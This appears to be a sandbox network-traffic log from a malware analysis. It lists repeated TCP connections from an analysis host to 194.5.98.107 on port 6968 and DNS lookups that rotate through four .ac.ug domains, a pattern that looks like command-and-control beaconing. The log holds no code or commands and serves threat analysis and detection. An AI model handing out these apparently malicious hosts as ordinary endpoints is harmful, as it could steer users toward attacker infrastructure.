Jun 26, 2022 09:47:01.895791054 CEST	49900	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:01.938278913 CEST	6968	49900	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:02.442711115 CEST	49900	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:02.487206936 CEST	6968	49900	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:04.134784937 CEST	49901	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:04.179728985 CEST	6968	49901	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:04.692811012 CEST	49901	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:04.735352039 CEST	6968	49901	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:05.239708900 CEST	49901	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:05.282308102 CEST	6968	49901	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:07.789252996 CEST	49903	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:07.831809044 CEST	6968	49903	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:08.334013939 CEST	49903	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:08.376602888 CEST	6968	49903	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:08.880717039 CEST	49903	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:08.925160885 CEST	6968	49903	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:10.603992939 CEST	49904	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:10.646477938 CEST	6968	49904	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:11.146603107 CEST	49904	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:11.189647913 CEST	6968	49904	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:11.693459034 CEST	49904	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:11.738394022 CEST	6968	49904	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:13.622252941 CEST	49905	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:13.664674997 CEST	6968	49905	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:14.178132057 CEST	49905	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:14.222454071 CEST	6968	49905	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:14.724921942 CEST	49905	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:14.767492056 CEST	6968	49905	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:16.468009949 CEST	49906	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:16.512725115 CEST	6968	49906	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:17.022079945 CEST	49906	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:17.065099955 CEST	6968	49906	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:17.568941116 CEST	49906	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:17.611610889 CEST	6968	49906	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:19.218106985 CEST	49907	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:19.260552883 CEST	6968	49907	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:19.772347927 CEST	49907	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:19.814837933 CEST	6968	49907	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:20.319293022 CEST	49907	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:20.364103079 CEST	6968	49907	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:21.718694925 CEST	49908	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:21.761341095 CEST	6968	49908	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:22.272612095 CEST	49908	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:22.315393925 CEST	6968	49908	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:22.819464922 CEST	49908	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:22.862257004 CEST	6968	49908	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:24.294898987 CEST	49910	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:24.337321043 CEST	6968	49910	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:24.850800991 CEST	49910	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:24.893424988 CEST	6968	49910	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:25.397783995 CEST	49910	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:25.440849066 CEST	6968	49910	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:26.765156031 CEST	49911	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:26.808054924 CEST	6968	49911	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:27.319761992 CEST	49911	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:27.362370014 CEST	6968	49911	194.5.98.107	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 26, 2022 09:45:59.455624104 CEST	62643	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:45:59.609529972 CEST	53	62643	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:00.972532034 CEST	54015	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:01.287909031 CEST	53	54015	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:01.302423000 CEST	54489	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:01.668832064 CEST	53	54489	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:01.692954063 CEST	52698	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:02.335402966 CEST	53	52698	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:03.387541056 CEST	61901	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:03.521174908 CEST	53	61901	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:04.861490011 CEST	58689	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:05.224469900 CEST	53	58689	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:05.263015985 CEST	50081	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:05.407883883 CEST	53	50081	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:05.412870884 CEST	49520	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:05.879934072 CEST	53	49520	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:06.900013924 CEST	65526	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:07.183330059 CEST	53	65526	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:08.484833956 CEST	52965	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:08.825110912 CEST	53	52965	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:08.830322981 CEST	52125	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:09.151824951 CEST	53	52125	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:09.172702074 CEST	63104	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:09.415802002 CEST	53	63104	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:10.499820948 CEST	55083	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:10.522844076 CEST	53	55083	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:12.819227934 CEST	58360	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:13.254749060 CEST	53	58360	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:13.285218000 CEST	59724	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:13.417113066 CEST	53	59724	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:13.464816093 CEST	56071	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:13.861335993 CEST	53	56071	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:14.922063112 CEST	60238	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:14.943308115 CEST	53	60238	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:16.272790909 CEST	61152	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:16.600392103 CEST	53	61152	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:16.648164988 CEST	49679	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:16.668729067 CEST	53	49679	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:16.694027901 CEST	60361	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:17.050290108 CEST	53	60361	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:18.078138113 CEST	64579	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:18.172508955 CEST	53	64579	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:19.661204100 CEST	49463	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:19.946038008 CEST	53	49463	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:19.972764015 CEST	55342	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:20.489490032 CEST	53	55342	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:20.527023077 CEST	62041	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:20.808574915 CEST	53	62041	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:21.836281061 CEST	62483	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:21.855746031 CEST	53	62483	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:23.232126951 CEST	55788	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:23.251566887 CEST	53	55788	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:23.258554935 CEST	62448	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:23.277683020 CEST	53	62448	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:23.283349037 CEST	58563	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:23.900996923 CEST	53	58563	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:24.919173002 CEST	57422	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:24.938805103 CEST	53	57422	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:26.186084986 CEST	64375	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:26.206334114 CEST	53	64375	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:26.214508057 CEST	63844	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:26.233730078 CEST	53	63844	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:26.238574028 CEST	57269	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:26.787453890 CEST	53	57269	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:27.820296049 CEST	49287	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:27.842549086 CEST	53	49287	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:29.162329912 CEST	64442	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:29.182220936 CEST	53	64442	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:29.200381994 CEST	56146	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:29.220069885 CEST	53	56146	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:29.253309011 CEST	50520	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:29.535430908 CEST	53	50520	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:31.247152090 CEST	56845	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:31.267640114 CEST	53	56845	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:32.667778969 CEST	55300	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:33.007348061 CEST	53	55300	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:33.015280008 CEST	51853	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:33.037226915 CEST	53	51853	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:33.043329000 CEST	62417	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:33.318209887 CEST	53	62417	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:34.348625898 CEST	62834	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:34.429868937 CEST	53	62834	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:35.806056023 CEST	61037	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:35.827079058 CEST	53	61037	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:35.834036112 CEST	58053	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:35.855199099 CEST	53	58053	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:35.862826109 CEST	56031	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:36.128879070 CEST	53	56031	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:37.149254084 CEST	58054	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:37.234436989 CEST	53	58054	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:38.397241116 CEST	59374	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:38.417606115 CEST	53	59374	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:38.421745062 CEST	49815	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:38.926244020 CEST	53	49815	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:38.943577051 CEST	52277	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:39.367716074 CEST	53	52277	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:40.389466047 CEST	49572	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:40.409852028 CEST	53	49572	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:41.557739019 CEST	56949	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:41.579132080 CEST	53	56949	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:41.592691898 CEST	61041	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:41.702279091 CEST	53	61041	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:41.707015991 CEST	54749	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:42.044704914 CEST	53	54749	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:43.057265997 CEST	53169	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:43.077081919 CEST	53	53169	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:44.241111040 CEST	57179	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:44.260705948 CEST	53	57179	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:44.268326998 CEST	55331	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:44.287756920 CEST	53	55331	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:44.291924953 CEST	64325	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:44.559916019 CEST	53	64325	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:45.588435888 CEST	58468	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:45.608629942 CEST	53	58468	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:46.926189899 CEST	56984	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:46.948671103 CEST	53	56984	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:46.956815958 CEST	51640	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:46.984714985 CEST	53	51640	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:47.045470953 CEST	63852	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:47.373270035 CEST	53	63852	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:48.388694048 CEST	54570	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:48.407943964 CEST	53	54570	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:49.737145901 CEST	56793	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:49.756731033 CEST	53	56793	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:49.759732962 CEST	61651	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:49.778947115 CEST	53	61651	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:49.780446053 CEST	59925	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:50.115060091 CEST	53	59925	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:51.131019115 CEST	61236	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:51.151547909 CEST	53	61236	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:52.489573956 CEST	49811	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:52.510042906 CEST	53	49811	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:52.512449980 CEST	62639	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:52.535131931 CEST	53	62639	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:52.536928892 CEST	54945	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:52.786977053 CEST	53	54945	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:53.803354025 CEST	59603	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:53.820684910 CEST	53	59603	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:54.972790003 CEST	56939	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:54.992006063 CEST	53	56939	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:54.994334936 CEST	57059	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:55.012367964 CEST	53	57059	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:55.015356064 CEST	54647	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:55.273374081 CEST	53	54647	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:56.287367105 CEST	58490	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:56.363706112 CEST	53	58490	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:57.506583929 CEST	56465	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:57.528808117 CEST	53	56465	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:57.533893108 CEST	61436	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:57.558281898 CEST	53	61436	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:57.560184956 CEST	57048	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:57.833945036 CEST	53	57048	8.8.8.8	192.168.2.6
Jun 26, 2022 09:46:58.850754976 CEST	54558	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:46:58.872860909 CEST	53	54558	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:00.019772053 CEST	56333	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:00.037149906 CEST	53	56333	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:00.040926933 CEST	59824	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:00.062521935 CEST	53	59824	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:00.064255953 CEST	61328	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:00.309726000 CEST	53	61328	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:01.320076942 CEST	50959	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:01.341156960 CEST	53	50959	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:02.488662004 CEST	59344	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:02.832598925 CEST	53	59344	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:02.834417105 CEST	55403	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:02.853538036 CEST	53	55403	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:02.855746984 CEST	58938	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:03.110609055 CEST	53	58938	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:04.116741896 CEST	56625	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:04.133922100 CEST	53	56625	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:05.284356117 CEST	57731	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:05.592148066 CEST	53	57731	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:05.593838930 CEST	49282	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:05.879611015 CEST	53	49282	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:06.250915051 CEST	60760	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:06.517442942 CEST	53	60760	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:07.654623985 CEST	64941	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:07.788269043 CEST	53	64941	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:08.926732063 CEST	53690	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:09.216793060 CEST	53	53690	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:09.218846083 CEST	62723	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:09.236004114 CEST	53	62723	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:09.238074064 CEST	55760	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:09.571846008 CEST	53	55760	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:10.585858107 CEST	65452	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:10.603106976 CEST	53	65452	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:11.740303040 CEST	62079	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:12.141793966 CEST	53	62079	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:12.144227982 CEST	51566	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:12.163436890 CEST	53	51566	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:12.167809010 CEST	50050	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:12.589550972 CEST	53	50050	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:13.602176905 CEST	59439	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:13.621402979 CEST	53	59439	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:14.769234896 CEST	64529	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:14.788824081 CEST	53	64529	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:14.792699099 CEST	56759	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:15.098356962 CEST	53	56759	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:15.100631952 CEST	65252	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:15.432835102 CEST	53	65252	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:16.445960999 CEST	65250	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:16.467267990 CEST	53	65250	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:17.613542080 CEST	60801	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:17.630446911 CEST	53	60801	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:17.632636070 CEST	60446	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:17.920314074 CEST	53	60446	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:17.922254086 CEST	51671	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:18.181885004 CEST	53	51671	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:19.196216106 CEST	50442	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:19.217360020 CEST	53	50442	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:20.366450071 CEST	53314	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:20.387876034 CEST	53	53314	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:20.390060902 CEST	61516	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:20.411376953 CEST	53	61516	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:20.413465977 CEST	50213	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:20.685486078 CEST	53	50213	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:21.696197987 CEST	61793	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:21.717863083 CEST	53	61793	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:22.865897894 CEST	51699	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:22.973720074 CEST	53	51699	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:22.975537062 CEST	51185	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:22.995135069 CEST	53	51185	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:22.996891022 CEST	59594	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:23.260404110 CEST	53	59594	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:24.274667025 CEST	55591	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:24.294061899 CEST	53	55591	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:25.442476988 CEST	54646	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:25.462004900 CEST	53	54646	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:25.464106083 CEST	62070	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:25.483431101 CEST	53	62070	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:25.485399008 CEST	62243	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:25.728574991 CEST	53	62243	8.8.8.8	192.168.2.6
Jun 26, 2022 09:47:26.744364023 CEST	63198	53	192.168.2.6	8.8.8.8
Jun 26, 2022 09:47:26.764005899 CEST	53	63198	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 26, 2022 09:45:59.455624104 CEST	192.168.2.6	8.8.8.8	0x98be	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:00.972532034 CEST	192.168.2.6	8.8.8.8	0x629e	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:01.302423000 CEST	192.168.2.6	8.8.8.8	0x8c38	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:01.692954063 CEST	192.168.2.6	8.8.8.8	0xfc5b	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:03.387541056 CEST	192.168.2.6	8.8.8.8	0x96b2	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:04.861490011 CEST	192.168.2.6	8.8.8.8	0xad3d	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:05.263015985 CEST	192.168.2.6	8.8.8.8	0xb7e9	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:05.412870884 CEST	192.168.2.6	8.8.8.8	0x1817	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:06.900013924 CEST	192.168.2.6	8.8.8.8	0x8ef1	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:08.484833956 CEST	192.168.2.6	8.8.8.8	0xb4d	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:08.830322981 CEST	192.168.2.6	8.8.8.8	0x6dc3	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:09.172702074 CEST	192.168.2.6	8.8.8.8	0x3ad1	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:10.499820948 CEST	192.168.2.6	8.8.8.8	0x4e28	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:12.819227934 CEST	192.168.2.6	8.8.8.8	0x85c9	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:13.285218000 CEST	192.168.2.6	8.8.8.8	0x2bbe	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:13.464816093 CEST	192.168.2.6	8.8.8.8	0x2d75	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:14.922063112 CEST	192.168.2.6	8.8.8.8	0x15d6	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:16.272790909 CEST	192.168.2.6	8.8.8.8	0x3d72	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:16.648164988 CEST	192.168.2.6	8.8.8.8	0x2cf7	Standard query (0)	tuekisaa.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:16.694027901 CEST	192.168.2.6	8.8.8.8	0x287e	Standard query (0)	parthaha.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:18.078138113 CEST	192.168.2.6	8.8.8.8	0x7860	Standard query (0)	nikahuve.ac.ug	A (IP address)	IN (0x0001)
Jun 26, 2022 09:46:19.661204100 CEST	192.168.2.6	8.8.8.8	0x877b	Standard query (0)	kalskala.ac.ug	A (IP address)	IN (0x0001)
